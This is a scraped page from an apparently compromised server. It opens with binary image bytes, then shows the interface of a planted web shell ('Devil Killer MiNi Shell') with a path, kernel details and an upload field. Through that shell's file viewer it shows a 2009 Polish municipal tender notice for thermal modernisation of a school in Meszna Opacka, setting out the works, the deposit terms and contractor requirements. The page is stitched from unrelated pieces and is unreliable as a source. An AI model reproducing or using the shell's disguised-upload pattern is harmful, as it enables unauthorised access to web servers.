JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090603/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090603/177648-N-2009.html

<p class="kh_header"><b>Tuchów: Termomodernizacja  budynku  Publicznej  Szkoły  Podstawowej  w  Mesznej  Opackiej</b><br>
<b>Numer ogłoszenia: 177648 - 2009; data zamieszczenia: 03.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchów , ul. Rynek 1, 33-170 Tuchów, woj. małopolskie, tel. 0146525218 w. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuchow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja  budynku  Publicznej  Szkoły  Podstawowej  w  Mesznej  Opackiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem wykonania są   roboty  remontowo - budowlane   związane  z  termomodernizacją  Publicznej  Szkoły  Podstawowej   w  Mesznej  Opackiej  zakresie:

- wykucie  z  muru  pozostałej  nieszczelnej  stolarki  okiennej  od  strony  południowej   w  ilości  3  szt.  (pomieszczenia  piwniczne),  
- odbicie  tynków  ościeży,  
- wykucie  drzwi  wejściowych  od  strony  zewnętrznej  do  kotłowni, 
- wykucie  skorodowanych   parapetów  okiennych, haków  i  krat  stalowych  okiennych,
- zdemontowanie  rur  spustowych  PCV, 
- zdemontowanie  pokrycia  i  podbitki  daszków  nad  wejściami  do  kotłowni  i  do  budynku  od  strony  wschodniej, 
- rozebranie  części  chodnika  z  kostki  betonowej, rozebraniu  opaski  i  chodnika  z  betonu   i  z  płytek  chodnikowych, 
- odkopanie  ścian  części  podpiwniczonej  budynku, 
- docieplenie  ścian  części  podpiwniczonej  płytami  polistyrenowymi  grubości  12  cm, 
- wykonanie  izolacji  pionowej   części  podpiwniczonej  budynku  folią  kubełkową, 
- zamontowanie  nowych  drzwi  stalowych  atestowanych  do  kotłowni, 
- wykonanie  rusztowania  zewnętrznego, 
- wykonanie  ocieplenia  budynku  styropianem  grubości  13  cm, 
- wykonanie  nowych  szlachetnych  tynków  elewacyjnych, 
- zamontowanie  nowej  stolarki  okiennej  PCV  od  strony  południowej - szt. 3 (pomieszczenia  piwniczne),  
- zamontowanie  pokrycia  i  podbitki  daszków,  rur  spustowych i rynien  nad  wejściami   do  budynku, 
- zamontowanie  nowych  ocynkowanych  krat  stalowych, obłożeniu  cokoła  obiektu  tynkiem  mozaikowym, 
- zamontowanie  zdemontowanych  rur  spustowych  PCV 
- wykonanie  podbudowy  i  ułożeniu  chodnika  z  kostki  betonowej, 
- zamontowanie  zdemontowanych  osłon  bocznych  wejścia  do  kotłowni, 
- wykonanie  podestu  i  schodów  wejściowych  do  kotłowni, 
- zdemontowanie  rusztowania  zewnętrznego, 
- pomalowanie  rur  gazowych, zamontowaniu  nowej  skrzynki  gazowej, 
- wywiezienie  gruzu  z  rozbiórki.

Zakres  robót  podlegających  trybowi  przetargowemu  musi  być  wykonany  w sposób  zgodny  z  powszechnie  obowiązującymi  warunkami  technicznymi  wykonania i  odbioru  robót  budowlanych, dla  tego  typu  obiektów,                 łącznie z  robotami  towarzyszącymi.

Szczegółowy  zakres  robót  określa  przedmiar  robót  i  specyfikacja  techniczna  wykonania  i  odbioru  robót  budowlanych ,   które  to  dokumenty  są   załącznikiem  do  specyfikacji  istotnych  warunków  zamówienia
Wykonywanie  robót  musi  uwzględniać  specyfikację  techniczną  wykonania  i  odbioru  robót  budowlanych.                         
Przy  doborze  materiałów  należy  kierować  się  wymaganiami  sprecyzowanymi  w  dokumentacji, oraz  specyfikacji  technicznej  wykonania  i  odbioru  robót.  Zaproponowane  materiały  nie  mogą  być  gorszej  jakości  niż  w  dokumentacji  technicznej.

Odstępstwo od tych wymagań jest możliwe po uzyskaniu zgody, Inwestora oraz inspektora nadzoru inwestorskiego.
Do  wykonania  robót  należy  użyć  wyłącznie  materiałów  posiadających  wymagane  atesty  i  certyfikaty, które  będą  wymagane  przy  odbiorze  końcowym  robót.

UWAGA: W  uzasadnionych  ekonomicznie i  technologicznie  przypadkach  wyłącznie  za  zgodą  Zamawiającego   - na  etapie  realizacji  zamówienia - w  przypadku  ukazania  się  na  rynku materiałów nowocześniejszych, o  lepszych  właściwościach i  parametrach, zamawiający  dopuszcza możliwość  ich  zastosowania  w  zamian  za  materiały  zaproponowane  w  ofercie i  w  projekcie  technicznym.
Jednak  zmiana  ta  nie  może  wpływać  na  zwiększenie  ceny  realizacji  zamówienia  przyjętej  przez  zamawiającego  w  wyniku  rozstrzygnięcia   przetargu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.10-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości   2 000,00 zł powinno być wniesione w terminie do  dnia  25.06.2009 r. do  godz. 10.00  Nie  wniesienie wadium w wymaganym terminie spowoduje odrzucenie oferty, zgodnie z Prawem zamówień publicznych.
Wadium wnoszone w pieniądzu powinno zostać przelane lub wpłacone na rachunek zamawiającego w banku:
Bank  Spółdzielczy  w  Bieczu  - Filia  Tuchów  Nr  75  8627  0001  2023  9000  2645  0004  z  adnotacją: Wadium -  nr sprawy:  [ZP-A-341-14/09].

1a. Wadium może być wniesione w jednej z następujących form:

1.w pieniądzu
2.poręczeniach lub w poręczeniach  bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo - kredytowej,  z tym  że  zobowiązanie  kasy  jest  zawsze  poręczeniem  pieniężnym
3.gwarancjach bankowych
4.w gwarancjach ubezpieczeniowych
5.poręczeniach udzielanych przez podmioty, o których mowa w art. 6b  ust  5 pkt. 2 ustawy z dnia 9 listopada 2000 o  utworzeniu PARP /Dz. U z 2007 r  Nr 42 poz. 275/

Wykonawcy  którzy  zamierzają  wnieść  wadium  w  formie  innej  niż  pieniądz  powinni  złożyć  oryginał  dokumentu  potwierdzający  wniesienie  wadium  w  pokoju   nr  1  przed  terminem  składania  ofert

Wadium  wnieść  można  w każdej  formie  wymienionej  w  pkt. 1.1a, 1 z  tym, że  dowód /kopię  potwierdzoną za  zgodność  z  oryginałem/  należy  umieścić  wewnątrz  oferty.

2.Zasady zwrotu wadium
Wadium wniesione w pieniądzu Zamawiający zwróci, zgodnie z art. 46 ust. 4, wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez  Wykonawcę.

Zgodnie z art. 46 ust. 1 ustawy, wadium zostanie zwrócone niezwłocznie, jeżeli:

1)upłyną ł termin związania z  ofertą,
2)zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy
3)Zamawiający unieważnił  postępowanie o udzielenie zamówienia, a  protesty  zostały  ostatecznie rozstrzygnięte lub  upłynął  termin  do  ich  wnoszenia.

Zgodnie z art. 46 ust. 2 ustawy, wadium zostanie zwrócone niezwłocznie po złożeniu pisemnego wniosku przez  wykonawcę:

1)który wycofał ofertę przed upływem terminu składania ofert,
2)którego oferta została odrzucona, 
3)który został wykluczony z postępowania

3. Utrata wadium

Zgodnie z art. 46 ust. 4a  i  5  ustawy  Prawo zamówień publicznych, wykonawca, którego oferta zostanie wybrana, traci wadium na rzecz Zamawiającego, w przypadku gdy:

1)nie  wniósł wymaganego  zabezpieczenia należytego wykonania umowy
2)odmówił  podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
3)zawarcie umowy w sprawie zamówienia publicznego  stało  się niemożliwe  z przyczyn  leżących po stronie wykonawcy.
Ponadto  zamawiający  zatrzymuje  wadium  wraz  z  odsetkami, jeżeli  wykonawca  w  odpowiedzi  na  wezwanie, o  którym  mowa  w  art. 26  ust. 3, nie  złożył  dokumentów  lub  oświadczeń  potwierdzających  spełnienie  warunków  udziału  w  postępowaniu, o  których  mowa w  art. 25  ust. 1, lub  pełnomocnictw  chyba, że  udowodni, że  wynika  to  z  przyczyn  nie  leżących  po  jego  stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się  wykonawcy, którzy:

A. Posiadają uprawnienia niezbędne do wykonania zamówienia, jeżeli  ustawy  nakładają  obowiązek  posiadania  takich  uprawnień. 

Przedmiotowy warunek zostanie uznany za spełniony, jeżeli wykonawca  udokumentuje uprawnienia do występowania w obrocie prawnym.

Ocena  tego warunku będzie dokonana  na  podstawie:

1.aktualnego  odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 m - cy  przed upływem terminu składania ofert.
W  przypadku  występowania  pełnomocnika  należy  dołączyć  pełnomocnictwo  dla osób  podpisujących  ofertę  do podejmowania  zobowiązań  w  imieniu  firmy składającej  ofertę, o  ile  nie  wynikają  z  przepisów  prawa lub innych  dokumentów

2.aktualnego  zaświadczenia  właściwego  naczelnika  urzędu  skarbowego  oraz  właściwego  oddziału  Zakładu Ubezpieczeń  Społecznych  lub  Kasy  Rolniczego  ubezpieczenia  Społecznego  potwierdzających  odpowiednio, że wykonawca  nie  zalega  z  opłacaniem  podatków, opłat  oraz  składek  na  ubezpieczenie  zdrowotne i  społeczne, lub  zaświadczeń, że  uzyskał  przewidziane  prawem  zwolnienie, odroczenie  lub  rozłożenie  na  raty zaległych płatności  lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu - wystawionych  nie  wcześniej niż  3  miesiące  przed  upływem  terminu  składania  ofert

B. Posiadają niezbędną wiedzę i doświadczenie  oraz  dysponują  potencjałem  technicznym  i  osobami  zdolnymi   do  wykonania  zamówienia, lub  przedstawią  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych  do  wykonania  zamówienia. 

a/ w  zakresie  wymaganego  doświadczenia - Zamawiający  wymaga, aby  wykonawca  wykazał  się  co  najmniej 2  robotami   budowlanymi   /jako  generalny  wykonawca/  wykonywanymi  na  budynkach  użyteczności  publicznej, zamieszkania  zbiorowego   budynkach  mieszkalnych  wielorodzinnych  lub  jednorodzinnych  polegającymi  na  wykonaniu  elewacji  budynku  metodą  lekko - mokrą  o  powierzchni  co  najmniej  400  m2  i   o  wartości   co  najmniej  100  000  PLN  każdy, 

Ocena  tego warunku będzie dokonana  na  podstawie:
- wykazu  zrealizowanych   zamówień  publicznych  wykonanych  przez  wykonawcę  w  okresie  ostatnich  5  lat  przed  dniem  wszczęcia postępowania  o udzielenie  zamówienia  /ogłoszenie  w  BZP/, a  jeżeli  okres  prowadzenia  działalności  jest krótszy - w tym  okresie, popartych  odpowiednimi  dokumentami, /referencje, protokoły  odbioru  końcowego, opinie zamawiających, dla  których zamówienia  zostały  zrealizowane/  iż  przedstawione  roboty  budowlane  zostały wykonane  należycie. 
Do  każdej  pozycji  wyszczególnionej  w  załączniku  nr  3   SIWZ  należy  załączyć  dokument  potwierdzający  należyte  wykonanie  zamówienia. 

Z  przedłożonego  dokumentu  jednoznacznie  ma  wynikać, że  wykonawca  wykonał  termomodernizację budynku  metodą  lekko - mokrą  o  powierzchni  co  najmniej  400  m2  i   o  wartości   co  najmniej   100  000  PLN  każdy,  

b/  w  zakresie   dysponowania   osobami  zdolnymi   do  wykonania  zamówienia.- Zamawiający  wymaga, aby  wykonawca  dysponował :
kierownikiem  budowy  posiadającym  uprawnienia  budowlane  w  specjalności  konstrukcyjno - budowlanej z  min. 10  letnim  doświadczeniem zawodowym  jako  kierownik  budowy  w  tym  doświadczenie  w  zakresie  kierowania budową  przynajmniej  jednego  obiektu  budowlanego  o  kubaturze  co  najmniej  1000 m3
posiadania  lub  dysponowania  odpowiednią  ilością  osób  /pracowników  fizycznych/ zdolnych do  wykonania zamówienia  w  ilości  nie mniejszej  niż  10

W  przypadku  nie dysponowania  osobami  zdolnymi  do  wykonania  zamówienia, anie  posiadania  potencjału  technicznego  należy  przedstawić  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych do  wykonania  zamówienia. 

Ocena tego warunku będzie dokonana w oparciu o:

- uprawnienia  budowlane  kierownika budowy w specjalności konstrukcyjno - budowlanej,  wraz z aktualnym zaświadczeniem  o przynależności  do właściwej Izby Inżynierów Budownictwa. 
- sporządzenia  wykazu  osób - podania  personelu  technicznego  który  będzie  wykonywać  zamówienie  lub  będzie uczestniczyć  w  wykonywaniu  zamówienia, wraz  z  informacjami  na  temat  ich  kwalifikacji  niezbędnych  do wykonania  zamówienia, a  także  wykonywanych  przez  nich  czynności. - załącznik  nr  4  SIWZ

C/ Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 

W  zakresie  wymaganej  sytuacji  ekonomicznej  i  finansowej  - Zamawiający  wymaga, aby  wykonawca :

- był  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej  na  kwotę nie mniejszą  niż  100 000  PLN

Ocena tego warunku zostanie dokonania w oparciu o:

- polisę  lub  inny  dokument  ubezpieczenia  potwierdzający, że  wykonawca  jest  ubezpieczony od odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej,  

D/  Nie podlega wykluczeniu z postępowania na podstawie art. 24  ust. UPzp

Ocena tego warunku zostanie dokonania w oparciu o:

- wykaz  oświadczeń  zawartych  w  dokumencie  o nazwie Oświadczenie /załącznik nr 2/ złożonych w trybie art. 22  ustawy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz  oświadczeń jakie  mają  dostarczyć  wykonawcy  w  celu  potwierdzenia  spełnienia  warunków  udziału  w  postępowaniu:

Każdy  Wykonawca  przystępujący do przetargu  winien złożyć oświadczenie, że:

- posiada  uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

- posiada  niezbędną wiedzę i doświadczenie oraz dysponują  potencjałem technicznym  i  osobami zdolnymi do wy­konania zamówienia, lub  przedstawią  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych  do  wykonania  zamówienia;

- znajduję się  w sytuacji ekonomicznej i finansowej za­pewniającej wykonanie zamówienia;

- nie podlega  wykluczeniu z postępowania o udzielenie zamówienia  na  podstawie  art. 24  ust. 1 i 2  uPzp.

Ponadto  Zamawiający  żąda  złożenia  oświadczenia, że  wykonawca:

- zapoznał  się  z  terenem  budowy  i że  nie  wnosi   żadnych  uwag

- w przypadku wyboru  oferty  podpisze  umowę, której  projekt  załączono do specyfikacji istotnych warunków zamówienia w terminie i czasie wskazanym przez Zamawiającego

- realizując  zamówienie  publiczne  w  ciągu  ostatnich  3  lat  przed  wszczęciem  postępowania  nie wyrządziliśmy szkody, nie  wykonując  zamówienia  lub  wykonując  je  z  nienależytą  starannością

- oferowane  materiały, urządzenia  spełniają  wszystkie warunki zamówienia, a w szczególności posiadają wszystkie  wymagane atesty  i  certyfikaty

- udzieli  co  najmniej  5   letniej  gwarancji  na  wykonane  prace  budowlane  

- roboty  budowlane  zostaną  wykonane  zgodnie  z  należytą  starannością, zgodnie  z normami  technicznymi, standardami, zasadami  sztuki  budowlanej, wiedzą  techniczną, a  w  szczególności  z obowiązującymi przepisami prawa w  tym  zakresie,  dokumentacją  projektowo - techniczną, etyką  zawodową     przepisami  BHP i  postanowieniami umowy.

- wszyscy  pracownicy  skierowani  do  realizacji  zamówienia  będą  posiadać  wymagane  kwalifikacje  techniczne  i  aktualne  badania  lekarskie

- po zapoznaniu się z wszystkimi warunkami zamówienia, projektem umowy i załącznikami  akceptują je bez zastrzeżeń

Wykaz  dokumentów jakie  mają  dostarczyć  wykonawcy  w  celu  potwierdzenia  spełnienia  warunków  udziału  w  postępowaniu:

Od wykonawców ubiegających się o przyznanie zamówienia wymagane jest,  w celu potwierdzenia spełnienia warunków,                o których mowa w art. 22 ust. 2 ustawy, przedstawienie wymienionych niżej dokumentów. 
Dokumenty te, zgodnie  z obowiązującym w tym zakresie Rozporządzeniem Prezesa  Rady  Ministrów   z dnia 19  maja 2006 r. /Dz. U. z  16  października  2008 r. Nr 188, poz. 1155./, winny  być  aktualne  w  terminie  składania  ofert                                            i   mogą być przedstawione w formie  oryginałów  lub  poświadczonych  kopii  Za  zgodność  z  oryginałem. 
Potwierdzenie zgodności należy dokonać na każdej stronie dokumentu.


W celu potwierdzenia spełnienia warunków udziału w postępowaniu oferta musi zawierać następujące oświadczenia i dokumenty :

- wykaz oświadczeń, że wykonawca spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1  i  że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 uPzp - zgodnych z treścią  załącznika  nr 2 SIWZ .

- aktualnego  odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 m - cy  przed upływem terminu składania ofert.

W  przypadku  wnoszenia  wspólnej  oferty  przez  wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy  dołączyć  oświadczenie  Wykonawców, że  ich  zobowiązania  co  do  wykonania  zamówienia  są   solidarne  a  także:  oświadczenia  i  dokumenty  potwierdzające  spełnienie  warunków  o  których  mowa    w  pkt. 19  i  20  SIWZ 

Każdy  z  wykonawców  wspólnie  ubiegających  się  o  udzielenie  zamówienia  składa  dokumenty  tak  jakby  sam  ubiegał  się   o  udzielenie  zamówienia  publicznego.

W  zakresie  dokumentów  potwierdzających  spełnienie  warunków  w  zakresie  wymaganego  doświadczenia  i  potencjału  ludzkiego  oraz  zdolności  finansowej, Zamawiający  dopuszcza  możliwość  sumowania  potencjałów  wszystkich  wykonawców  wspólnie  ubiegających  się  o  zamówienie.

Ponadto w  przypadku  Wykonawców   wspólnie  ubiegających się  o zamówienie, wykonawcy  ustanawiają  pełnomocnika  do  reprezentowania  ich  w  postępowaniu  o  udzielenie  zamówienia  albo  reprezentowania    ich  w  postępowaniu i  zawarcia  umowy  w sprawie  zamówienia  publicznego.

W przypadku podpisywania oferty lub poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę/y nie  wymienione w dokumencie rejestracyjnym wykonawcy, należy do oferty dołączyć stosowne  pełnomocnictwo. 
Pełnomocnictwo powinno być przedłożone w formie oryginału  lub  notarialnie  potwierdzonej  kopii. 

Zamawiający przypomina, że dokument pełnomocnictwa , jak i jego odpis  zgodnie z przepisami ustawy z dnia 9 września 2000  o opłacie skarbowej podlegają opłacie skarbowej. 

Opłata skarbowa powinna być odprowadzona zgodnie z Rozporządzeniem Ministra Finansów z dnia 5 grudnia 2000 r. w sprawie pobierania zapłaty i zwrotu opłaty skarbowej oraz sposobu prowadzenia rejestrów tej opłaty .

Jeżeli  oferta  wykonawców  o  których  mowa  w  art. 23  ust. 1  uPzp  zostanie  wybrana, zamawiający  przed  podpisaniem  umowy  w  sprawie  zamówienia  publicznego  zażąda  przedstawienia  umowy  regulującej   współpracę  podmiotów  występujących  wspólnie.    

- aktualnych  zaświadczeń  właściwego  naczelnika  urzędu  skarbowego  oraz  właściwego  oddziału  Zakładu Ubezpieczeń  Społecznych  lub  Kasy  Rolniczego  ubezpieczenia  Społecznego  potwierdzających  odpowiednio, że wykonawca  nie  zalega  z  opłacaniem  podatków, opłat  oraz  składek  na  ubezpieczenie  zdrowotne  i  społeczne, lub zaświadczeń, że  uzyskał  przewidziane  prawem  zwolnienie, odroczenie  lub  rozłożenie  na  raty  zaległych  płatności lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu - wystawionych  nie  wcześniej  niż  3 miesiące przed  upływem  terminu  składania  ofert

- dokumentów stwierdzających, że  osoby  które  wykonywać  będą  zamówienie  posiadają  wymagane  uprawnienia, jeżeli  ustawy  nakładają  obowiązek  posiadania  takich  uprawnień.                                                                                 
Należy  podać  wykaz  pracowników  nadzoru,  zawierający  potwierdzenie  wymaganych  kwalifikacji   i doświadczenia w  wykonywaniu  zamówień  jak  w  niniejszym  postępowaniu  /załączyć  uprawnienia  budowlane  wraz  z   aktualnym  zaświadczeniem  o   przynależności  kierownika  budowy   do  właściwej  Izby  Inżynierów  Budownictwa

- wykazu  wykonanych   robót  budowlanych,  w okresie  ostatnich  pięciu  lat przed  dniem  wszczęcia  postępowania o  udzielenie  zamówienia, a  jeżeli  okres  prowadzenia  działalności  jest  krótszy - w  tym  okresie, odpowiadających  swoim  rodzajem   i  wartością  robotom  budowlanym  stanowiącym  przedmiot  zamówienia z  podaniem  ich  wartości  oraz  daty       i  miejsca  wykonania,  przed  dniem  wszczęcia postępowania  o  udzielenie  zamówienia  /ogłoszenie  w  BZP/, a  jeżeli  okres  prowadzenia  działalności  jest krótszy - w tym  okresie,

- dokumentów  potwierdzających,  że roboty  budowlane, przedstawione w  powyższym  w wykazie, zostały wykonane z należytą starannością,

- wykazu  osób, którymi  dysponuje  lub  będzie  dysponował  wykonawca  i  które  będą  uczestniczyć  w  wykonywaniu zamówienia, wraz  z  informacjami  na  temat  ich  kwalifikacji  zawodowych, doświadczenia  i  wykształcenia niezbędnych  do  wykonywania  zamówienia, a  także  zakresu  wykonywanych  prze  nie  czynności

- pisemnego  zobowiązania  innych  podmiotów  do  udostępnienia  osób  zdolnych  do  wykonania  zamówienia  innych podmiotów,  jeżeli  w  sporządzonym  wykazie  na  załączniku   do  SIWZ   wykonawca  wskazał  osoby,  którymi będzie  dysponował

- wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje Wykonawca, lub  będzie  dysponował  wykonawca, rodzaj  narzędzi urządzeń  i  sprzętu, rok  budowy, parametry  techniczne, ilość  sztuk, stan  własności    

- pisemnego  zobowiązania  innych  podmiotów  do  udostępnienia  niezbędnych  do  wykonania  zamówienia  narzędzi  i  urządzeń , jeżeli  w  sporządzonym  wykazie  na  załączniku  do  SIWZ , wykonawca  wskazał  narzędzia i urządzenia, którymi  będzie  dysponował

- wskazania  przez  wykonawcę  w  załączniku  nr  6 SIWZ  tej  części  zamówienia, która  zostanie  powierzona podwykonawcom           
Zamawiający  żąda  przedstawienia   w  swojej  ofercie  i  zakresu  powierzonych  prac  podwykonawcom w  przypadku  ich  występowania.

